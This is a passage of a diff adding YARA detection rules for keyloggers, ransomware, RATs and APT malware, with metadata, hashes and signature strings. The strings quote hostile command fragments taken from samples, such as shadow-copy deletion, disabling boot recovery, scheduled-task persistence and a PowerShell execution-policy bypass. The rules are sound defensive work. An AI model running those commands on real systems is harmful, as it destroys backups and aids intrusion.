+      tags = "DEMO, FILE, MAL, T1045"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x0000 and filesize < 2000KB and 1 of them
+}
+
+rule HawkEye_Keylogger_Feb18_1_RID302C : DEMO EXE FILE MAL T1056 {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9"
+      date = "2018-02-12 12:28:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "bb58922ad8d4a638e9d26076183de27fb39ace68aa7f73adc0da513ab66dc6fa"
+      tags = "DEMO, EXE, FILE, MAL, T1056"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "UploadReportLogin.asmx" fullword wide
+      $s2 = "tmp.exe" fullword wide
+      $s3 = "%appdata%\\" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule Destructive_Ransomware_Gen1_RID31CB : CRIME DEMO EXE FILE MAL RANSOM {
+   meta:
+      description = "Detects destructive malware"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+      date = "2018-02-12 13:37:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85"
+      tags = "CRIME, DEMO, EXE, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" fullword wide
+      $x2 = "delete shadows /all /quiet" fullword wide
+      $x3 = "delete catalog -quiet" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule VBS_Obfuscated_Mal_Feb18_1_RID3039 : DEMO MAL OBFUS SCRIPT T1064 {
+   meta:
+      description = "Detects malicious obfuscated VBS observed in February 2018"
+      author = "Florian Roth"
+      reference = "https://goo.gl/zPsn83"
+      date = "2018-02-12 12:30:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab"
+      hash2 = "c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036"
+      hash3 = "e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74"
+      tags = "DEMO, MAL, OBFUS, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "A( Array( (1* 2^1 )+" ascii
+      $x2 = ".addcode(A( Array(" ascii
+      $x3 = "false:AA.send:Execute(AA.responsetext):end" ascii
+      $x4 = "& A( Array(  (1* 2^1 )+" ascii
+      $s1 = ".SYSTEMTYPE:NEXT:IF (UCASE(" ascii
+      $s2 = "A = STR:next:end function" ascii
+      $s3 = "&WSCRIPT.SCRIPTFULLNAME&CHR" fullword ascii
+   condition: 
+      filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule CN_disclosed_20180208_lsls_RID2FCC : CHINA DEMO FILE MAL {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+      date = "2018-02-08 12:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9"
+      tags = "CHINA, DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 3000KB and $x1
+}
+
+rule CN_disclosed_20180208_c_RID2E71 : CHINA DEMO EXE FILE MAL T1047 T1053 {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+      date = "2018-02-08 11:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7"
+      tags = "CHINA, DEMO, EXE, FILE, MAL, T1047, T1053"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+      $x2 = "schtasks /create /sc minute /mo 1 /tn Server /tr " fullword wide
+      $x3 = "www.upload.ee/image/" wide
+      $s1 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
+      $s2 = "/Server.exe" fullword wide
+      $s3 = "Executed As " fullword wide
+      $s4 = "WmiPrvSE.exe" fullword wide
+      $s5 = "Stub.exe" fullword ascii
+      $s6 = "Download ERROR" fullword wide
+      $s7 = "shutdown -r -t 00" fullword wide
+      $s8 = "Select * From AntiVirusProduct" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule CN_disclosed_20180208_System3_RID30C6 : CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+      date = "2018-02-08 12:54:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "73fa84cff51d384c2d22d9e53fc5d42cb642172447b07e796c81dd403fb010c2"
+      tags = "CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "WmiPrvSE.exe" fullword wide
+      $s1 = "C:\\Users\\sgl\\AppData\\Local\\" ascii
+      $s2 = "Temporary Projects\\WmiPrvSE\\" ascii
+      $s3 = "$15a32a5d-4906-458a-8f57-402311afc1c1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and $a1 and 1 of ( $s* )
+}
+
+rule CN_disclosed_20180208_Mal1_RID2F59 : CHINA DEMO EXE FILE HIGHVOL MAL {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+      date = "2018-02-08 11:53:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e"
+      tags = "CHINA, DEMO, EXE, FILE, HIGHVOL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "%SystemRoot%\\system32\\termsrvhack.dll" fullword ascii
+      $x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+      $a1 = "taskkill /f /im cmd.exe" fullword ascii
+      $a2 = "taskkill /f /im mstsc.exe" fullword ascii
+      $a3 = "taskkill /f /im taskmgr.exe" fullword ascii
+      $a4 = "taskkill /f /im regedit.exe" fullword ascii
+      $a5 = "taskkill /f /im mmc.exe" fullword ascii
+      $s1 = "K7TSecurity.exe" fullword ascii
+      $s2 = "ServUDaemon.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "28e3a58132364197d7cb29ee104004bf" or 1 of ( $x* ) or 3 of them )
+}
+
+rule CN_disclosed_20180208_KeyLogger_1_RID3227 : CHINA DEMO EXE FILE MAL T1056 {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+      date = "2018-02-08 13:53:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf"
+      tags = "CHINA, DEMO, EXE, FILE, MAL, T1056"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "Process already elevated." fullword wide
+      $x3 = "GetKeyloggErLogsResponse" fullword ascii
+      $x4 = "get_encryptedPassword" fullword ascii
+      $x5 = "DoDownloadAndExecute" fullword ascii
+      $x6 = "GetKeyloggeRLogs" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule CN_disclosed_20180208_Mal4_RID2F5C : CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+      date = "2018-02-08 11:53:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f7549c74f09be7e4dbfb64006e535b9f6d17352e236edc2cdb102ec3035cf66e"
+      tags = "CHINA, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "Microsoft .Net Framework COM+ Support" fullword ascii
+      $s2 = "Microsoft .NET and Windows XP COM+ Integration with SOAP" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them and pe.exports ( "SPACE" )
+}
+
+rule CN_disclosed_20180208_Mal5_RID2F5D : CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from disclosed CN malware set"
+      author = "Florian Roth"
+      reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+      date = "2018-02-08 11:54:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "24c05cd8a1175fbd9aca315ec67fb621448d96bd186e8d5e98cb4f3a19482af4"
+      hash2 = "05696db46144dab3355dcefe0408f906a6d43fced04cb68334df31c6dfd12720"
+      tags = "CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+      $s2 = "Server.exe" fullword ascii
+      $s3 = "System.Windows.Forms.Form" fullword ascii
+      $s4 = "Stub.Resources.resources" fullword ascii
+      $s5 = "My.Computer" fullword ascii
+      $s6 = "MyTemplate" fullword ascii
+      $s7 = "Stub.My.Resources" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule Sofacy_Campaign_Mal_Feb18_cdnver_RID3324 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detects Sofacy malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ClearskySec/status/960924755355369472"
+      date = "2018-02-07 14:35:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "cdnver.dll" fullword wide
+      $x2 = { 25 73 0A 00 00 00 00 00 30 00 00 00 20 00 2D 00
+              20 00 00 00 0A 00 00 00 25 00 73 00 00 00 00 00
+              69 00 6D 00 61 00 67 00 65 00 2F 00 6A 00 70 00
+              65 00 67 } 
+      $s1 = "S7%s - %lu" fullword ascii
+      $s2 = "SNFIRNW" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "01f3d0fe6fb9d9df24620e67afc143c7" or 1 of ( $x* ) or 2 of them )
+}
+
+rule ME_Campaign_Malware_1_RID2EDA : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from Middle Eastern campaign reported by Talos"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+      date = "2018-02-07 11:32:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "618f76eaf4bd95c690d43e84d617efe9" )
+}
+
+rule ME_Campaign_Malware_2_RID2EDB : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from Middle Eastern campaign reported by Talos"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+      date = "2018-02-07 11:32:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "QuickAssist.exe" fullword wide
+      $s2 = "<description>Microsoft Modern Sharing Solution</description>" fullword ascii
+      $s3 = "GBEWCWA" fullword ascii
+      $s4 = "name=\"QuickAssist\" " fullword ascii
+      $s5 = "Cimzal" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b06055e6cc2a804111ab6964df1ca4ae" or 4 of them )
+}
+
+rule ME_Campaign_Malware_3_RID2EDC : APT DEMO FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from Middle Eastern campaign reported by Talos"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+      date = "2018-02-07 11:32:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
+      tags = "APT, DEMO, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "objWShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"%appdata%\"\"\\sys.ps1\", 0 " fullword ascii
+      $x2 = "objFile.WriteLine \"New-Item -Path \"\"$ENV:APPDATA\\Microsoft\\Templates\"\" -ItemType Directory -Force }\" " fullword ascii
+      $x3 = "objFile.WriteLine \"$path = \"\"$ENV:APPDATA\\Microsoft\\Templates\\Report.doc\"\"\" " fullword ascii
+      $s4 = "File=appData & \"\\sys.ps1\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x6553 and filesize < 400KB and 1 of them
+}
+
+rule ME_Campaign_Malware_4_RID2EDD : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects malware from Middle Eastern campaign reported by Talos"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+      date = "2018-02-07 11:32:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "fb7da233a35ac523d6059fff543627ab"
+}
+
+rule ME_Campaign_Malware_5_RID2EDE : APT DEMO EXE MAL MIDDLE_EAST T1047 {
+   meta:
+      description = "Detects malware from Middle Eastern campaign reported by Talos"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+      date = "2018-02-07 11:32:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-08-18"
+      hash1 = "d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1"
+      hash2 = "e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5"
+      tags = "APT, DEMO, EXE, MAL, MIDDLE_EAST, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "D:\\me\\do\\do\\obj\\" ascii
+      $s2 = "Select * from Win32_ComputerSystem" fullword wide
+      $s3 = "Get_Antivirus" fullword ascii
+      $s4 = "{{\"id\":\"{0}\",\"user\":\"{1}\",\"path\":\"{2}\"}}" fullword wide
+      $s5 = "update software online" fullword wide
+      $s6 = "time.nist.gov" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and 5 of them or all of them
+}
+
+rule GoldDragon_malware_Feb18_1_RID309F : APT CHINA CRIME DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Gold Dragon report"
+      author = "Florian Roth"
+      reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+      date = "2018-02-03 12:47:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, CRIME, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "168c2f7752511dfd263a83d5d08a90db" or pe.imphash ( ) == "0606858bdeb129de33a2b095d7806e74" or pe.imphash ( ) == "51d992f5b9e01533eb1356323ed1cb0f" or pe.imphash ( ) == "bb801224abd8562f9ee8fb261b75e32a" )
+}
+
+rule GoldDragon_Aux_File_RID2E5E : APT CHINA CRIME DEMO {
+   meta:
+      description = "Detects export from Gold Dragon - February 2018"
+      author = "Florian Roth"
+      reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+      date = "2018-02-03 11:11:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, CRIME, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/////////////////////regkeyenum////////////" ascii
+   condition: 
+      filesize < 500KB and 1 of them
+}
+
+rule GoldDragon_RunningRAT_RID2F19 : APT CHINA CRIME DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Running RAT from Gold Dragon report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/rW1yvZ"
+      date = "2018-02-03 11:42:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88"
+      hash2 = "2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863"
+      hash3 = "7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51"
+      tags = "APT, CHINA, CRIME, DEMO, EXE, FILE, MAL, T1085"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "C:\\USERS\\WIN7_x64\\result.log" fullword wide
+      $x2 = "rundll32.exe %s RunningRat" fullword ascii
+      $x3 = "SystemRat.dll" fullword ascii
+      $x4 = "rundll32.exe %s ExportFunction" fullword ascii
+      $x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii
+      $x6 = "ixeorat.bin" fullword ascii
+      $x7 = "C:\\USERS\\Public\\result.log" fullword ascii
+      $a1 = "emanybtsohteg" fullword ascii
+      $a2 = "tekcosesolc" fullword ascii
+      $a3 = "emankcosteg" fullword ascii
+      $a4 = "emantsohteg" fullword ascii
+      $a5 = "tpokcostes" fullword ascii
+      $a6 = "putratSASW" fullword ascii
+      $s1 = "ParentDll.dll" fullword ascii
+      $s2 = "MR - Already Existed" fullword ascii
+      $s3 = "MR First Started, Registed OK!" fullword ascii
+      $s4 = "RM-M : LoadResource OK!" fullword ascii
+      $s5 = "D:\\result.log" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "c78ccc8f02286648c4373d3bf03efc43" or pe.exports ( "RunningRat" ) or 1 of ( $x* ) or 5 of ( $a* ) or 3 of ( $s* ) )
+}
+
+rule Scarcruft_malware_Feb18_1_RID306B : APT DEMO EXE FILE G0067 MAL NK {
+   meta:
+      description = "Detects Scarcruft malware - February 2018"
+      author = "Florian Roth"
+      reference = "https://twitter.com/craiu/status/959477129795731458"
+      date = "2018-02-03 12:39:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0067, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "d:\\HighSchool\\version 13\\2ndBD\\T+M\\" ascii
+      $x2 = "cmd.exe /C ping 0.1.1.2" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule TopHat_Malware_Jan18_2_RID2EFB : APT DEMO EXE FILE MAL T1050 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file e.exe"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+      date = "2018-01-29 11:37:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1050"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
+      $s2 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" ascii
+      $s3 = "LError loading dock zone from the stream. Expecting version %d, but found %d." fullword wide
+      $s4 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
+      $s5 = "UENCRYPTION" fullword ascii
+      $s6 = "TEXPORTAPIS" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "f98cebcae832abc3c46e6e296aecfc03" and 5 of them )
+}
+
+rule TopHat_BAT_RID2A97 : APT DEMO SCRIPT {
+   meta:
+      description = "Semiautomatically generated YARA rule - file cgen.bat"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+      date = "2018-01-29 07:03:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f998271c4140caad13f0674a192093092e2a9f7794a7fbbdaa73ae8f2496c387"
+      hash2 = "0fbc6fd653b971c8677aa17ecd2749200a4a563f9dd5409cfb26d320618db3e2"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "= New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"" ascii
+      $s2 = "goto Start" fullword ascii
+      $s3 = ":Start" fullword ascii
+   condition: 
+      filesize < 5KB and all of them
+}
+
+rule Quasar_RAT_Jan18_1_RID2D35 : APT DEMO EXE FILE MAL T1047 {
+   meta:
+      description = "Detects Quasar RAT"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
+      date = "2018-01-29 10:22:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
+      hash2 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "ping -n 20 localhost > nul" fullword wide
+      $s2 = "HandleDownloadAndExecuteCommand" fullword ascii
+      $s3 = "DownloadAndExecute" fullword ascii
+      $s4 = "UploadAndExecute" fullword ascii
+      $s5 = "ShellCommandResponse" fullword ascii
+      $s6 = "Select * From Win32_ComputerSystem" fullword wide
+      $s7 = "Process could not be started!" fullword wide
+      $s8 = ".Core.RemoteShell" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and $a1 and 3 of them
+}
+
+rule Suckfly_Nidiran_Gen_1_RID2F1F : DEMO EXE FILE G0039 GEN MAL {
+   meta:
+      description = "Detects Suckfly Nidiran Trojan"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+      date = "2018-01-28 11:43:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ac7d7c676f58ebfa5def9b84553f00f283c61e4a310459178ea9e7164004e734"
+      tags = "DEMO, EXE, FILE, G0039, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WriteProcessMemory fail at %d " fullword ascii
+      $s2 = "CreateRemoteThread fail at %d " fullword ascii
+      $s3 = "CreateRemoteThread Succ" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule Suckfly_Nidiran_Gen_2_RID2F20 : DEMO EXE FILE G0039 GEN MAL {
+   meta:
+      description = "Detects Suckfly Nidiran Trojan"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+      date = "2018-01-28 11:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b53a316a03b46758cb128e5045dab2717cb36e7b5eb1863ce2524d4f69bc2cab"
+      hash2 = "eaee2bf83cf90d35dab8a4711f7a5f2ebf9741007668f3746995f4564046fbdf"
+      tags = "DEMO, EXE, FILE, G0039, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "WorkDll.dll" fullword ascii
+      $x2 = "%userprofile%\\Security Center\\secriter.dll" fullword ascii
+      $s1 = "DLL_PROCESS_ATTACH is called" fullword ascii
+      $s2 = "Support Security Accounts Manager For Microsoft Windows.If this service is stopped, any services that depended on it will fail t" ascii
+      $s3 = "before CreateRemoteThread" fullword ascii
+      $s4 = "CreateRemoteThread Succ" fullword ascii
+      $s5 = "Microsoft Security Accounts Manager" fullword ascii
+      $s6 = "DoRunRemote" fullword ascii
+      $s7 = "AutoRunFun" fullword ascii
+      $s8 = "ServiceMain is called" fullword ascii
+      $s9 = "DllRegisterServer is called" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule Suckfly_Nidiran_Gen_3_RID2F21 : DEMO EXE FILE G0039 GEN MAL {
+   meta:
+      description = "Detects Suckfly Nidiran Trojan"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+      date = "2018-01-28 11:44:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c2022e1114b162e79e44d974fd310d53e1bbdd8cb4f217553c1227cafed78855"
+      hash2 = "47731c9d985ebc2bd7227fced3cc44c6d72e29b52f76fccbdaddd76cc3450706"
+      tags = "DEMO, EXE, FILE, G0039, GEN, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "RUN SHELLCODE FAIL" fullword ascii
+      $x2 = "RUN PROCESS FAILD!" fullword ascii
+      $x3 = "DOWNLOAD FILE FAILD" fullword ascii
+      $x4 = "MODIFYCONFIG FAIL!" fullword ascii
+      $x5 = "GetFileAttributes FILE FAILD" fullword ascii
+      $x6 = "MODIFYCONFIG SUCC!" fullword ascii
+      $s1 = "cmd.exe /c %s" fullword ascii
+      $s2 = "error to create pipe!" fullword ascii
+      $s3 = "%s\\%08x.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ae0f4ebf7e8ce91d6548318a3cf82b7a" or 1 of ( $x* ) or 2 of them )
+}
+
+rule OilRig_RGDoor_Gen1_RID2D8D : APT DEMO EXE FILE G0049 MAL MIDDLE_EAST {
+   meta:
